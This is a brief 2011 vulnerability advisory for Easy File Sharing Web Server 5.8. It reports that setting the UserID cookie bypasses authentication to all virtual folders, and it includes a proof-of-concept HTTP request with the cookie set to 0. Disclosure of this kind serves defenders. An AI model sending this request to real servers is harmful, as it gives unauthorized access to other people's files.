If the UserID cookie is set all virtual folders become accessible in Easy File Sharing Web Server version 5.8.
21615d4f36d5b7cd45ee4e5f342b744e70077736f0c8d2d3d17689b061ac2454
------------------------------------------------------------------------
Software................Easy File Sharing Web Server Version 5.8
Vulnerability...........Authentication Bypass
Threat Level............Serious (3/5)
Download................http://www.sharing-file.com/
Disclosure Date.........4/6/2011
Tested On...............Windows Vista
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
If the UserID cookie is set all virtual folders become accessible.
--PoC--
GET http://localhost/[Virtual Folder] HTTP/1.1
Host: localhost
Cookie: UserID=0